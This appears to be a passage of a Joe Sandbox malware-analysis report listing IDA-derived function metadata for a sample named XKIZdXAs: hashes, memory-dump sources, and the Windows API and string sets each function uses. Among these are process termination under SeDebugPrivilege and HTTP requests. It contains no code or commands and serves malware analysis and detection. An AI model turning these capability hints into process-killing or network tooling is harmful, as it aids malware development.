                                                                          • Opcode ID: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                                          • Instruction ID: 4aebf15386565b36e4d178d5c42cfa46ab1f59e2a9f88ac39559ac2fbd3db3d4
                                                                          • Opcode Fuzzy Hash: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                                          • Instruction Fuzzy Hash: 10217F21A0E94389EE20BB11E5443B9E360EF84B80FC24131D54D07AB5FE3CD546C724
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                          • String ID:
                                                                          • API String ID: 2672075419-0
                                                                          • Opcode ID: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                                          • Instruction ID: 5a1f8c0d3b694c7cafa05949dd189a13cb5011e1b47dd3dac75ba144412b2372
                                                                          • Opcode Fuzzy Hash: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                                          • Instruction Fuzzy Hash: BC919236B0E6529EEB50AF65D4403BDA3A1FB45B88FD24035DE4D436A9EE38E4079720
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                          • String ID:
                                                                          • API String ID: 685491774-0
                                                                          • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                          • Instruction ID: ea9349ebfcaec9aeb40d3e4fb7adb25c196bb5a50fb6e9daf69c4b4960d39e62
                                                                          • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                          • Instruction Fuzzy Hash: 9211D234B1E54286F754BB76A85856D6261EFCCB80FC29539C90E4BB60EE3DD0468320
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Init$Clear
                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                          • API String ID: 3467423407-1765764032
                                                                          • Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                          • Instruction ID: 22a7b5a5671a8100957442527eb71959b6a5a6443e49f71bab83bd7bc0365f56
                                                                          • Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                          • Instruction Fuzzy Hash: 47A18132A0AB518AEB10AF65E4406ADB7A1FB84B98FD60131EE4D077A4FF3CD546C750
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                          • String ID: -----$SysListView32
                                                                          • API String ID: 2361508679-3975388722
                                                                          • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                          • Instruction ID: ae214ebf15ecd2de930cfef7e09103a7dfa8aa3a1856681f79e88ad14e8ca2f0
                                                                          • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                          • Instruction Fuzzy Hash: 8251D432A197818EE720DF25D8446DD73A5FB84784F81013AEE4C47B65DF38DA55CB40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 2019164449-3381328864
                                                                          • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                          • Instruction ID: 18a9858fe591f37fbab5a4135ae9d7780ed818a95fdb1330a8a1b762664c084d
                                                                          • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                          • Instruction Fuzzy Hash: A2218125B1E54388FF50BB21EA542B9A364EF85BC4FC29136D94D472B5FE2CE1038721
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                          • String ID:
                                                                          • API String ID: 1903627254-0
                                                                          • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                          • Instruction ID: bd77984eb87ddc7f582a2501ad0ab42861b547f24162b268096d97de8cffdb49
                                                                          • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                          • Instruction Fuzzy Hash: 03026F62A0EA968ADB50EF29D4442BDA761FB84B94F914032EE4E077B4EF3CD546C710
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                          • String ID:
                                                                          • API String ID: 3210457359-0
                                                                          • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                          • Instruction ID: ac5a6921c78d291415ec0a342e12ec5fe34dcb271477fff529d89e77a2a9172b
                                                                          • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                          • Instruction Fuzzy Hash: 1861C129A0E6438EEB74BA6585407BA9252EB80794FD24931DA1D036F5EE7CE4439320
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                          • API String ID: 3721556410-2107944366
                                                                          • Opcode ID: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                                          • Instruction ID: aa140170e8121928d3b5907cb2e97a5f5c88937b7899c45e207093075dbdfc85
                                                                          • Opcode Fuzzy Hash: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                                          • Instruction Fuzzy Hash: 6D61A126A1AA529DEB00EF61E8905EDB771FB48B88FD21132ED0D136B5EF38D546C350
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                          • String ID: SeDebugPrivilege
                                                                          • API String ID: 2533919879-2896544425
APIs
Strings
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 2$P
• API String ID: 93392585-1110268094
APIs
Strings
Similarity
• API ID: Window$LongMessageSend$Show
• String ID: '
• API String ID: 257662517-1997036262
APIs
Strings
Similarity
• API ID: IconLoad_invalid_parameter_noinfo
• String ID: blank$info$question$stop$warning
• API String ID: 4060274358-404129466
APIs
Strings
Similarity
• API ID: HandleLoadModuleString$Messagewprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4051287042-3128320259
APIs
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
APIs
Similarity
• API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
• String ID:
• API String ID: 50796853-0
APIs
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
APIs
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: ArraySafe$Data$Access$UnaccessVartype
• String ID:
• API String ID: 2550207440-0
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
Similarity
• API ID: MessageSendWindow$Enabled
• String ID:
• API String ID: 3694350264-0
                                                                          • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                          • Instruction ID: fff45a7854adfcd14d90c7db0deb8077106b598bb00b606e215701f27e344ef3
                                                                          • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                          • Instruction Fuzzy Hash: D4917221E5F64649FBB5AA1594543B9E363EF44B84FD64432EA4D036B1EF3CE8928320
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                          • Instruction ID: b2c2189873bbf7340b7f1b60fa6a9cd553236daa1f4ad9a96de868883abaeaa3
                                                                          • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                          • Instruction Fuzzy Hash: AD51D512A1E2D15EFB61AB31510067DAFB1FB4ABC0FCA8074DA4907B66DE2CD462C731
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                          • String ID:
                                                                          • API String ID: 3401586794-0
                                                                          • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                          • Instruction ID: b2af66d1f5ad9211aaca89ccaf6c9302f878194860921f9933fefa3e7e5a0da4
                                                                          • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                          • Instruction Fuzzy Hash: CB51D32660D7419EE714EF21A800BAEB7A4FB48B88FD54032DE0D03B64EF39D456C720
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                          • String ID: DllGetClassObject
                                                                          • API String ID: 668425406-1075368562
                                                                          • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                          • Instruction ID: 57adcde393bc2e82033f5360878850461dec6b4b50115366d772fbc287be1cdc
                                                                          • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                          • Instruction Fuzzy Hash: 30519E22E1EB868AEB14AF12E540379A364FB44B84FD68134DB4D47A61EF7CF056CB10
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                          • String ID:
                                                                          • API String ID: 161812096-0
                                                                          • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                          • Instruction ID: 9caabf7f20ca789741759e12242ae9e29db14706ee6751d8c9df48afc5147b2a
                                                                          • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                          • Instruction Fuzzy Hash: 57413736A0AB4589EB509F62D8806AC73B1FB48F98F964035DE4D43774EF38E546C710
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 395352322-0
                                                                          • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                          • Instruction ID: b6161e4bd125f455641c9faa01541a189f856c54bdb56207dcd8aef1132f332f
                                                                          • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                          • Instruction Fuzzy Hash: 1D41A13261DB858AE721DF11E4543EAA3A1FB89784FC50131EA8D47A78EF3DD14ACB10
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                                          • Instruction ID: 6c56ad831bac8921a34f1ec3e49ed3e3cf1db1cc694d67560ccd54b06a3ef089
                                                                          • Opcode Fuzzy Hash: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                                          • Instruction Fuzzy Hash: 1B319221B1EB458DEB60AF16F444169B3A0FB85FD0FC98236DA5E037A4EE3CE4468714
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AllocByteCharMultiStringWide
                                                                          • String ID:
                                                                          • API String ID: 3603722519-0
                                                                          • Opcode ID: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                                          • Instruction ID: 776baba156500bfb3c2f3d6b7fe5ff289d9cae62cc6a3bfa02acc2fb3b40263b
                                                                          • Opcode Fuzzy Hash: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                                          • Instruction Fuzzy Hash: 89312F21B0EB458DEB60AF16E444669F3A0FB45F90FC94236EA5D037A5EF3CE5868710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 1025951953-3636473452
                                                                          • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                          • Instruction ID: d77458f2c7c73c903928c6eb61a71f6f8c10ad04fb2fcfc604e8edeb97599afa
                                                                          • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                          • Instruction Fuzzy Hash: 46316F366196818BE3709F25F454B5AB761EB88790F905235EB9903F68DF3CD846CF10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
